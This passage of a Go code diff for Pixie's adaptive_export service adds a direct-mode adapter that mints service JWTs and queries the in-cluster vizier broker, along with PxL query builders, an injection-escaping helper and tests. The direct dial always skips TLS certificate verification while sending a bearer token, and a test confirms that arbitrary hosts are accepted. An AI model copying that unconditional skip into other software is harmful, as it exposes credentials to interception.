getClusterIDsAsString(clusterIDs []*uuidpb.UUID) string { - scriptClusterID := "" - for i, id := range clusterIDs { - if i > 0 { - scriptClusterID = scriptClusterID + "," - } - scriptClusterID = scriptClusterID + utils.ProtoToUUIDStr(id) - } - return scriptClusterID -} - func (c *Client) getScriptDefinition(s *cloudpb.RetentionScript) (*script.ScriptDefinition, error) { resp, err := c.pluginClient.GetRetentionScript(c.ctx, &cloudpb.GetRetentionScriptRequest{ID: s.ScriptID}) if err != nil { @@ -223,6 +228,19 @@ func (c *Client) getScriptDefinition(s *cloudpb.RetentionScript) (*script.Script }, nil } +// DeleteDataRetentionScript removes the script with the given UUID. +// Used by INSTALL_PRESET_SCRIPTS to purge stale scripts that target +// tables no longer in the schema. +func (c *Client) DeleteDataRetentionScript(scriptID string) error { + req := &cloudpb.DeleteRetentionScriptRequest{ + ID: utils.ProtoFromUUIDStrOrNil(scriptID), + } + _, err := c.pluginClient.DeleteRetentionScript(c.ctx, req) + return err +} + +// AddDataRetentionScript creates a new retention script on clusterID, +// running every frequencyS seconds with the given PxL contents. func (c *Client) AddDataRetentionScript(clusterID string, scriptName string, description string, frequencyS int64, contents string) error { req := &cloudpb.CreateRetentionScriptRequest{ ScriptName: scriptName, @@ -236,24 +254,32 @@ func (c *Client) AddDataRetentionScript(clusterID string, scriptName string, des return err } -func (c *Client) UpdateDataRetentionScript(clusterID string, scriptID string, scriptName string, description string, frequencyS int64, contents string) error { - req := &cloudpb.UpdateRetentionScriptRequest{ - ID: utils.ProtoFromUUIDStrOrNil(scriptID), - ScriptName: &types.StringValue{Value: scriptName}, - Description: &types.StringValue{Value: description}, - Enabled: &types.BoolValue{Value: true}, - FrequencyS: &types.Int64Value{Value: frequencyS}, - Contents: &types.StringValue{Value: contents}, - ClusterIDs: []*uuidpb.UUID{utils.ProtoFromUUIDStrOrNil(clusterID)}, +// EnsureClickHousePluginEnabled is the boot-time idempotent op the +// operator calls in main.go. If the plugin is already enabled with a +// non-empty ExportURL, no-op. Otherwise, enable it with the supplied +// fallback URL. Returns the resolved ExportURL for diagnostics. +func (c *Client) EnsureClickHousePluginEnabled(fallbackExportURL string) (string, error) { + plugin, err := c.GetClickHousePlugin() + if err != nil { + return "", err } - _, err := c.pluginClient.UpdateRetentionScript(c.ctx, req) - return err -} - -func (c *Client) DeleteDataRetentionScript(scriptID string) error { - req := &cloudpb.DeleteRetentionScriptRequest{ - ID: utils.ProtoFromUUIDStrOrNil(scriptID), + if plugin.RetentionEnabled { + cfg, err := c.GetClickHousePluginConfig() + if err != nil { + return "", err + } + if cfg.ExportURL != "" { + return cfg.ExportURL, nil + } } - _, err := c.pluginClient.DeleteRetentionScript(c.ctx, req) - return err + if fallbackExportURL == "" { + return "", fmt.Errorf("pixie: plugin not enabled and no fallback ExportURL provided") + } + if err := c.EnableClickHousePlugin( + &ClickHousePluginConfig{ExportURL: fallbackExportURL}, + plugin.LatestVersion, + ); err != nil { + return "", err + } + return fallbackExportURL, nil } diff --git a/src/vizier/services/adaptive_export/internal/pixieapi/BUILD.bazel b/src/vizier/services/adaptive_export/internal/pixieapi/BUILD.bazel new file mode 100644 index 00000000000..3cf661a2c79 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pixieapi/BUILD.bazel @@ -0,0 +1,38 @@ +load("@px//bazel:pl_build_system.bzl", "pl_go_test") + +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") + +go_library( + name = "pixieapi", + srcs = ["pixieapi.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/pixieapi", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/api/go/pxapi", + "//src/api/go/pxapi/errdefs", + "//src/api/go/pxapi/types", + "//src/shared/services/utils", + ], +) + +pl_go_test( + name = "pixieapi_test", + srcs = ["pixieapi_test.go"], + embed = [":pixieapi"], +) diff --git a/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi.go b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi.go new file mode 100644 index 00000000000..61c8bef283f --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi.go @@ -0,0 +1,223 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package pixieapi adapts pxapi to a flat-row Pixie interface for the +// controller. Use when the operator (not the cloud's retention plugin) +// is the writer of pixie observation rows — necessary on deployments +// where the cloud can't reach an internal ClickHouse endpoint. +package pixieapi + +import ( + "context" + "errors" + "fmt" + "os" + "sync" + + "px.dev/pixie/src/api/go/pxapi" + "px.dev/pixie/src/api/go/pxapi/errdefs" + "px.dev/pixie/src/api/go/pxapi/types" + jwtutils "px.dev/pixie/src/shared/services/utils" +) + +// Row is a flat per-pixie-row map[col]any. Compatible with sink's +// per-row JSONEachRow encoder. +type Row map[string]any + +// Adapter executes PxL via pxapi and returns flat rows. +type Adapter struct { + client *pxapi.Client + clusterID string + // directOpts, when non-nil, makes Query rebuild a pxapi.Client per + // call with a freshly-minted service JWT in WithBearerAuth. Used + // for direct-mode (in-cluster vizier-query-broker), where the cloud + // passthrough proxy is bypassed entirely. JWTs are minted fresh + // because GenerateJWTForService produces 10-minute claims and we + // want each fan-out window to carry its own valid token. + directOpts *DirectOptions +} + +// DirectOptions configures direct-mode connection to vizier in-cluster. +// Use when the cloud's passthrough proxy can't authorize the operator's +// API key (e.g. self-hosted clouds where API keys are scoped per-cluster +// and a freshly-deployed cluster isn't yet linked to the key's owner). +type DirectOptions struct { + // VizierAddr is the in-cluster gRPC endpoint, typically + // "vizier-query-broker-svc.pl.svc.cluster.local:50300". + VizierAddr string + // SigningKey is the cluster's JWT signing key, mounted from + // pl-cluster-secrets/jwt-signing-key. + SigningKey string + // ServiceID is the issuer-side service identifier (claim "sub"). + // Defaults to "adaptive_export" if empty. + ServiceID string +} + +// New constructs an Adapter wired to the cluster's vizier via cloud passthrough. +func New(client *pxapi.Client, clusterID string) *Adapter { + return &Adapter{client: client, clusterID: clusterID} +} + +// NewDirect constructs an Adapter that bypasses the pixie cloud and +// connects directly to the in-cluster vizier-query-broker. Each Query +// call rebuilds the gRPC client with a fresh service JWT. +// +// TLS: direct dial uses pxapi.WithDirectTLSSkipVerify() (added in +// PR #49 b523ce362 for the same node-IP-dial scenario PEM +// direct-query needs). That option skips InsecureSkipVerify gating on +// PX_DISABLE_TLS and on addr containing "cluster.local" — the AE +// operator always targets cluster-internal vizier with a self-signed +// CA we don't have a clean way to mount, so the always-skip semantics +// match the deployment shape and remove the brittle env coupling. +// CodeRabbit r3379377607. +func NewDirect(clusterID string, opts DirectOptions) (*Adapter, error) { + if opts.ServiceID == "" { + opts.ServiceID = "adaptive_export" + } + return &Adapter{clusterID: clusterID, directOpts: &opts}, nil +} + +// NewDirectFromEnv builds a direct-mode Adapter from the runtime env. +// Reads ADAPTIVE_VIZIER_DIRECT_ADDR for the broker addr and +// PL_JWT_SIGNING_KEY for the signing key (matching kelvin/metadata +// pod env conventions). Returns an error if either is missing. +func NewDirectFromEnv(clusterID string) (*Adapter, error) { + addr := os.Getenv("ADAPTIVE_VIZIER_DIRECT_ADDR") + if addr == "" { + return nil, errors.New("pixieapi: ADAPTIVE_VIZIER_DIRECT_ADDR not set") + } + sk := os.Getenv("PL_JWT_SIGNING_KEY") + if sk == "" { + return nil, errors.New("pixieapi: PL_JWT_SIGNING_KEY not set (mount pl-cluster-secrets/jwt-signing-key)") + } + // NewDirect re-checks the PX_DISABLE_TLS + cluster.local precondition + // so both entry points get the same compile-time guard against pxapi's + // log.Fatal at first Query. + return NewDirect(clusterID, DirectOptions{VizierAddr: addr, SigningKey: sk}) +} + +// Query executes pxl on the configured cluster and aggregates every +// emitted record from every table into one []Row. +func (a *Adapter) Query(ctx context.Context, pxl string) ([]Row, error) { + client := a.client + if a.directOpts != nil { + // Direct mode: build fresh client + fresh service JWT for each + // query. JWT is 10-min; fan-out is seconds, so this is safe. + jwt, err := jwtutils.SignJWTClaims( + jwtutils.GenerateJWTForService(a.directOpts.ServiceID, "vizier"), + a.directOpts.SigningKey, + ) + if err != nil { + return nil, fmt.Errorf("pixieapi: sign JWT: %w", err) + } + // pxapi.Client doesn't expose a Close — its grpc.ClientConn is + // unexported. We accept GC-time reclamation: a Query in direct + // mode runs once per anomaly window per refresh interval (≥30s + // in production), so the per-query connection-leak rate is + // bounded and matched by goroutine + JWT expiry every ~10min. + // If we ever build a high-throughput direct-mode path, swap to + // a long-lived client + JWT-refresh ticker instead. + c, err := pxapi.NewClient(ctx, + pxapi.WithCloudAddr(a.directOpts.VizierAddr), + pxapi.WithDirectTLSSkipVerify(), + pxapi.WithBearerAuth(jwt), + ) + if err != nil { + return nil, fmt.Errorf("pixieapi: direct dial: %w", err) + } + client = c + } + vz, err := client.NewVizierClient(ctx, a.clusterID) + if err != nil { + return nil, fmt.Errorf("pixieapi: vizier dial: %w", err) + } + mux := newCollector() + rs, err := vz.ExecuteScript(ctx, pxl, mux) + if err != nil { + return nil, fmt.Errorf("pixieapi: ExecuteScript: %w", err) + } + defer rs.Close() + if err := rs.Stream(); err != nil { + if errdefs.IsCompilationError(err) { + return nil, fmt.Errorf("pixieapi: PxL compilation: %w", err) + } + return nil, fmt.Errorf("pixieapi: stream: %w", err) + } + return mux.rows(), nil +} + +type collector struct { + mu sync.Mutex + all []Row +} + +func newCollector() *collector { return &collector{} } + +func (c *collector) AcceptTable(_ context.Context, _ types.TableMetadata) (pxapi.TableRecordHandler, error) { + return &tableHandler{out: c}, nil +} + +func (c *collector) rows() []Row { + c.mu.Lock() + defer c.mu.Unlock() + return append([]Row(nil), c.all...) +} + +type tableHandler struct { + out *collector + meta types.TableMetadata +} + +func (h *tableHandler) HandleInit(_ context.Context, md types.TableMetadata) error { + h.meta = md + return nil +} + +func (h *tableHandler) HandleRecord(_ context.Context, rec *types.Record) error { + row := make(Row, len(h.meta.ColInfo)) + for _, col := range h.meta.ColInfo { + datum := rec.GetDatum(col.Name) + if datum == nil { + continue + } + row[col.Name] = datumValue(datum) + } + h.out.mu.Lock() + h.out.all = append(h.out.all, row) + h.out.mu.Unlock() + return nil +} + +func (h *tableHandler) HandleDone(_ context.Context) error { return nil } + +func datumValue(d types.Datum) any { + switch v := d.(type) { + case *types.BooleanValue: + return v.Value() + case *types.Int64Value: + return v.Value() + case *types.Float64Value: + return v.Value() + case *types.StringValue: + return v.Value() + case *types.Time64NSValue: + return v.Value() + case *types.UInt128Value: + return v.Value() + default: + return d.String() + } +} diff --git a/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi_test.go b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi_test.go new file mode 100644 index 00000000000..a664f8b245b --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pixieapi/pixieapi_test.go @@ -0,0 +1,101 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package pixieapi + +import ( + "os" + "testing" +) + +// The direct-mode constructors are the #36 broker-direct entry points (AE bypasses +// the cloud passthrough → immune to the "cluster is not in a healthy state" gate). +// These guards are what stop a misconfigured operator from crashing at first Query +// (pxapi log.Fatal's on cluster.local without PX_DISABLE_TLS), so they must hold. + +func clearDirectEnv(t *testing.T) { + t.Helper() + for _, k := range []string{"ADAPTIVE_VIZIER_DIRECT_ADDR", "PL_JWT_SIGNING_KEY", "PX_DISABLE_TLS"} { + t.Setenv(k, "") // t.Setenv records + restores; "" then Unsetenv for a clean slate + os.Unsetenv(k) + } +} + +func TestNewDirectFromEnv_MissingAddr(t *testing.T) { + clearDirectEnv(t) + if _, err := NewDirectFromEnv("cid"); err == nil { + t.Fatal("expected error when ADAPTIVE_VIZIER_DIRECT_ADDR is unset") + } +} + +func TestNewDirectFromEnv_MissingSigningKey(t *testing.T) { + clearDirectEnv(t) + t.Setenv("ADAPTIVE_VIZIER_DIRECT_ADDR", "vizier-query-broker-svc.pl.svc.cluster.local:50300") + if _, err := NewDirectFromEnv("cid"); err == nil { + t.Fatal("expected error when PL_JWT_SIGNING_KEY is unset") + } +} + +// TestNewDirect_NoEnvGate — direct dial now uses pxapi.WithDirectTLSSkipVerify +// (PR #49 b523ce362), which doesn't read PX_DISABLE_TLS at all. NewDirect +// must therefore accept any addr regardless of env. +func TestNewDirect_NoEnvGate(t *testing.T) { + clearDirectEnv(t) + for _, addr := range []string{ + "vizier-query-broker-svc.pl.svc.cluster.local:50300", + "vizier.example:50300", + "10.42.0.5:50300", + } { + a, err := NewDirect("cid", DirectOptions{VizierAddr: addr, SigningKey: "k"}) + if err != nil { + t.Fatalf("NewDirect(%q): %v", addr, err) + } + if a.directOpts == nil { + t.Fatalf("direct-mode Adapter must carry directOpts (so Query takes the broker path)") + } + if a.client != nil { + t.Error("direct-mode Adapter must NOT hold a cloud client (it dials per-query)") + } + if a.directOpts.ServiceID != "adaptive_export" { + t.Errorf("ServiceID should default to adaptive_export, got %q", a.directOpts.ServiceID) + } + } +} + +func TestNewDirectFromEnv_Success(t *testing.T) { + clearDirectEnv(t) + t.Setenv("ADAPTIVE_VIZIER_DIRECT_ADDR", "vizier-query-broker-svc.pl.svc.cluster.local:50300") + t.Setenv("PL_JWT_SIGNING_KEY", "signing-key") + t.Setenv("PX_DISABLE_TLS", "1") + a, err := NewDirectFromEnv("cluster-123") + if err != nil { + t.Fatalf("unexpected error: %v", err) + } + if a.directOpts == nil || a.clusterID != "cluster-123" { + t.Fatalf("expected direct Adapter for cluster-123, got %+v", a) + } + if a.directOpts.VizierAddr == "" || a.directOpts.SigningKey != "signing-key" { + t.Errorf("directOpts not populated from env: %+v", a.directOpts) + } +} + +// New (cloud) path stays cloud — sanity that the two constructors don't cross-wire. +func TestNewCloudHasNoDirectOpts(t *testing.T) { + a := New(nil, "cid") + if a.directOpts != nil { + t.Error("cloud Adapter must not have directOpts") + } +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel b/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel index 80afa3f2875..606898d6eaf 100644 --- a/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel +++ b/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel @@ -15,16 +15,32 @@ # SPDX-License-Identifier: Apache-2.0 load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") go_library( name = "pxl", - srcs = ["pxl.go"], + srcs = [ + "compile.go", + "queryfor.go", + "tables.go", + ], importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl", visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], deps = [ - "//src/api/go/pxapi", - "//src/api/go/pxapi/errdefs", - "//src/api/go/pxapi/types", - "@com_github_sirupsen_logrus//:logrus", + "//src/vizier/services/adaptive_export/internal/anomaly", + ], +) + +pl_go_test( + name = "pxl_test", + srcs = [ + "compile_test.go", + "queryfor_bench_test.go", + "queryfor_test.go", + "tables_test.go", + ], + embed = [":pxl"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", ], ) diff --git a/src/vizier/services/adaptive_export/internal/pxl/compile.go b/src/vizier/services/adaptive_export/internal/pxl/compile.go new file mode 100644 index 00000000000..de3d16d0aad --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/compile.go @@ -0,0 +1,74 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package pxl + +import ( + "fmt" + "strconv" + "strings" + "time" +) + +// CompilePassthrough returns a precompiled PxL TEMPLATE for a firehose +// (empty-Target) pull of `table` over a fixed rolling `window`. The result +// is identical to QueryFor with an empty anomaly.Target EXCEPT the two +// precise time_ bounds are left as `%d` verbs (lower, upper — both +// UnixNano), to be rendered per tick with Render / fmt.Sprintf. +// +// Why a template instead of calling QueryFor every tick: +// - QueryFor takes `now` and derives the relative `start_time=` bound from +// `now - sliceStart`. For passthrough that delta is ALWAYS `window`, so +// the relative bound is constant across ticks and can be baked in once. +// - The script body (DataFrame, upid_to_namespace/pod, display) never +// changes, so it is compiled once at loop construction rather than +// re-resolved on every refresh. +// +// Only the two post-filter bounds vary per tick, so the rendered string is +// byte-identical to what QueryFor would have produced for the same window — +// the precompiled path is a pure performance/structure change, not a +// behavioural one. upid→namespace/pod resolution stays in PxL (unchanged). +func CompilePassthrough(table string, window time.Duration) (string, error) { + if !IsBuiltin(table) { + return "", fmt.Errorf("%w: %q", ErrUnknownTable, table) + } + // Mirror QueryFor's pad: covers the full window plus a 30s safety + // margin, clamped to a 30s floor. + pad := window + 30*time.Second + if pad < 30*time.Second { + pad = 30 * time.Second + } + relStart := "-" + strconv.FormatInt(int64(pad/time.Second), 10) + "s" + + // Builtin table names never contain '%', so embedding them around the + // two `%d` verbs is Sprintf-safe. + var b strings.Builder + b.WriteString(pxSetMaxRows) + b.WriteString("import px\n") + b.WriteString("df = px.DataFrame(table='" + table + "', start_time='" + relStart + "')\n") + b.WriteString("df = df[df.time_ >= px.int64_to_time(%d)]\n") + b.WriteString("df = df[df.time_ < px.int64_to_time(%d)]\n") + b.WriteString("df.namespace = px.upid_to_namespace(df.upid)\n") + b.WriteString("df.pod = px.upid_to_pod_name(df.upid)\n") + b.WriteString("px.display(df, '" + table + "')\n") + return b.String(), nil +} + +// Render fills a CompilePassthrough template with the precise [sliceStart, +// sliceEnd) bounds for one tick. +func Render(tmpl string, sliceStart, sliceEnd time.Time) string { + return fmt.Sprintf(tmpl, sliceStart.UnixNano(), sliceEnd.UnixNano()) +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/compile_test.go b/src/vizier/services/adaptive_export/internal/pxl/compile_test.go new file mode 100644 index 00000000000..724e12e827c --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/compile_test.go @@ -0,0 +1,88 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package pxl + +import ( + "errors" + "strings" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// TestCompilePassthrough_MatchesQueryFor is the behaviour-preservation +// proof: rendering a precompiled template for a window must produce the +// EXACT bytes QueryFor emits for an empty Target over that same window. +// If this holds, the compiled firehose path is a pure structural change — +// it cannot capture differently than the legacy path it replaces. +func TestCompilePassthrough_MatchesQueryFor(t *testing.T) { + window := 3 * time.Minute + // Fixed instant so UnixNano bounds are deterministic. + now := time.Unix(1778339984, 0).UTC() + sliceStart := now.Add(-window) + sliceEnd := now + + legacy, err := QueryFor("http_events", anomaly.Target{}, sliceStart, sliceEnd, now) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + tmpl, err := CompilePassthrough("http_events", window) + if err != nil { + t.Fatalf("CompilePassthrough: %v", err) + } + got := Render(tmpl, sliceStart, sliceEnd) + if got != legacy { + t.Fatalf("rendered template != QueryFor\n--- compiled ---\n%s\n--- legacy ---\n%s", got, legacy) + } +} + +// TestCompilePassthrough_Shape pins the essential tokens so an accidental +// edit to the template (dropped time bound, lost upid resolution) fails +// loudly even without the byte-equality oracle above. +func TestCompilePassthrough_Shape(t *testing.T) { + tmpl, err := CompilePassthrough("dns_events", 60*time.Second) + if err != nil { + t.Fatalf("CompilePassthrough: %v", err) + } + for _, want := range []string{ + "#px:set max_output_rows_per_table=1000000", // raise Pixie 10k cap + "px.DataFrame(table='dns_events', start_time='-90s')", // window 60s + 30s pad + "df.time_ >= px.int64_to_time(%d)", + "df.time_ < px.int64_to_time(%d)", + "px.upid_to_namespace(df.upid)", + "px.upid_to_pod_name(df.upid)", + "px.display(df, 'dns_events')", + } { + if !strings.Contains(tmpl, want) { + t.Errorf("template missing %q:\n%s", want, tmpl) + } + } + // Exactly two %d verbs (the two time bounds) — nothing else parameterized. + if n := strings.Count(tmpl, "%d"); n != 2 { + t.Errorf("template has %d %%d verbs, want 2:\n%s", n, tmpl) + } +} + +// TestCompilePassthrough_UnknownTable rejects non-builtin tables, matching +// QueryFor's contract. +func TestCompilePassthrough_UnknownTable(t *testing.T) { + _, err := CompilePassthrough("not_a_table", time.Second) + if !errors.Is(err, ErrUnknownTable) { + t.Fatalf("err=%v want ErrUnknownTable", err) + } +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/pxl.go b/src/vizier/services/adaptive_export/internal/pxl/pxl.go deleted file mode 100644 index e4e27a40b6b..00000000000 --- a/src/vizier/services/adaptive_export/internal/pxl/pxl.go +++ /dev/null @@ -1,80 +0,0 @@ -// Copyright 2018- The Pixie Authors. -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -// SPDX-License-Identifier: Apache-2.0 - -package pxl - -import ( - "context" - "fmt" - - log "github.com/sirupsen/logrus" - "px.dev/pixie/src/api/go/pxapi" - "px.dev/pixie/src/api/go/pxapi/errdefs" - "px.dev/pixie/src/api/go/pxapi/types" -) - -// recordCounter counts the number of records received -type recordCounter struct { - count int -} - -func (r *recordCounter) HandleInit(ctx context.Context, metadata types.TableMetadata) error { - return nil -} - -func (r *recordCounter) HandleRecord(ctx context.Context, record *types.Record) error { - r.count++ - return nil -} - -func (r *recordCounter) HandleDone(ctx context.Context) error { - return nil -} - -type recordCounterMux struct { - counter *recordCounter -} - -func (m *recordCounterMux) AcceptTable(ctx context.Context, metadata types.TableMetadata) (pxapi.TableRecordHandler, error) { - return m.counter, nil -} - -// ExecuteScript executes a PxL script and returns the number of records returned -func ExecuteScript(ctx context.Context, client *pxapi.Client, clusterID string, pxl string) (int, error) { - vz, err := client.NewVizierClient(ctx, clusterID) - if err != nil { - return 0, fmt.Errorf("failed to create vizier client: %w", err) - } - - counter := &recordCounter{} - tm := &recordCounterMux{counter: counter} - - resultSet, err := vz.ExecuteScript(ctx, pxl, tm) - if err != nil { - return 0, fmt.Errorf("failed to execute script: %w", err) - } - defer resultSet.Close() - - if err := resultSet.Stream(); err != nil { - if errdefs.IsCompilationError(err) { - return 0, fmt.Errorf("PxL compilation error: %w", err) - } - return 0, fmt.Errorf("error streaming results: %w", err) - } - - log.Debugf("Script execution time: %v, bytes received: %v", resultSet.Stats().ExecutionTime, resultSet.Stats().TotalBytes) - return counter.count, nil -} diff --git a/src/vizier/services/adaptive_export/internal/pxl/queryfor.go b/src/vizier/services/adaptive_export/internal/pxl/queryfor.go new file mode 100644 index 00000000000..168c54a4722 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/queryfor.go @@ -0,0 +1,114 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package pxl + +import ( + "errors" + "fmt" + "regexp" + "strconv" + "strings" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// ErrUnknownTable is returned by QueryFor for a table not in BuiltinTables. +var ErrUnknownTable = errors.New("pxl: unknown pixie table") + +// pxSetMaxRows raises Pixie's per-table result cap via the query-broker's +// own `#px:set` query flag (parsed from the script — see +// src/vizier/services/query_broker/controllers/query_flags.go, default +// max_output_rows_per_table = 10000). Without it the planner's +// add_limit_to_batch_result_sink_rule silently truncates any px.display to +// 10000 rows, so a wide firehose window (or a very busy pod) loses the +// excess at the read. 1e6 is far above any realistic AE window. See +// memory project-ae-passthrough-10k-cap. +const pxSetMaxRows = "#px:set max_output_rows_per_table=1000000\n" + +// QueryFor returns a PxL script that selects rows from `table` for the +// (namespace, pod) of `t`, time-bounded to [sliceStart, sliceEnd). The +// `now` argument lets us compute a relative `start_time=` for +// px.DataFrame (PxL rejects ISO-string absolute bounds; we use a +// generously-padded relative bound and post-filter precisely with +// px.int64_to_time on the time_ column). +func QueryFor(table string, t anomaly.Target, sliceStart, sliceEnd, now time.Time) (string, error) { + if !IsBuiltin(table) { + return "", fmt.Errorf("%w: %q", ErrUnknownTable, table) + } + // pad covers (now - sliceStart) plus a 30s safety margin. When + // sliceStart is in the future (caller bug), now.Sub is negative and + // we'd ask pixie for a positive-only relative start; clamp to 30s. + pad := now.Sub(sliceStart) + 30*time.Second + if pad < 30*time.Second { + pad = 30 * time.Second + } + relStart := "-" + strconv.FormatInt(int64(pad/time.Second), 10) + "s" + + var b strings.Builder + b.WriteString(pxSetMaxRows) + b.WriteString("import px\n") + b.WriteString("df = px.DataFrame(table='" + table + "', start_time='" + relStart + "')\n") + b.WriteString("df = df[df.time_ >= px.int64_to_time(" + strconv.FormatInt(sliceStart.UnixNano(), 10) + ")]\n") + b.WriteString("df = df[df.time_ < px.int64_to_time(" + strconv.FormatInt(sliceEnd.UnixNano(), 10) + ")]\n") + b.WriteString("df.namespace = px.upid_to_namespace(df.upid)\n") + // px.upid_to_pod_name returns "/" (carnot: + // metadata_ops.h UPIDToPodNameUDF::Exec → absl::Substitute("$0/$1", ns, name)), + // not the bare pod name. Filtering against bare t.Pod would always + // miss; build the namespaced key when we have both fields. + b.WriteString("df.pod = px.upid_to_pod_name(df.upid)\n") + if t.Namespace != "" { + b.WriteString("df = df[df.namespace == '" + escapePxL(t.Namespace) + "']\n") + } + if t.Pod != "" { + if t.Namespace != "" { + // Both fields present — use exact equality on the namespaced key. + b.WriteString("df = df[df.pod == '" + escapePxL(t.Namespace+"/"+t.Pod) + "']\n") + } else { + // Pod-only fallback: df.pod is "/", so a bare-pod + // equality always misses. Regex-anchor "/" via + // px.regex_match so the defensive path stays functional. + b.WriteString("df = df[px.regex_match('^[^/]+/" + escapePxL(regexp.QuoteMeta(t.Pod)) + "$', df.pod)]\n") + } + } + b.WriteString("px.display(df, '" + table + "')\n") + return b.String(), nil +} + +// pxlEscaper turns raw bytes that could break out of a PxL single-quoted +// string into their Python-style escape sequences. The backslash MUST be +// mapped FIRST so its own substitution doesn't get double-escaped when +// processed alongside the rest. +// +// Why each entry: PxL is Python; a single-quoted literal closes on a bare +// ' and a raw newline (0x0A) terminates the statement, letting an +// attacker-controlled Target.Pod/Target.Namespace value inject a new +// PxL statement after the close. ', \r, \n, \t, and NUL are the +// byte-level shapes that can break the string boundary; everything +// else is opaque to the PxL parser inside a string literal. +var pxlEscaper = strings.NewReplacer( + `\`, `\\`, + `'`, `\'`, + "\n", `\n`, + "\r", `\r`, + "\t", `\t`, + "\x00", `\0`, +) + +func escapePxL(s string) string { + return pxlEscaper.Replace(s) +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/queryfor_bench_test.go b/src/vizier/services/adaptive_export/internal/pxl/queryfor_bench_test.go new file mode 100644 index 00000000000..64de6290687 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/queryfor_bench_test.go @@ -0,0 +1,69 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: 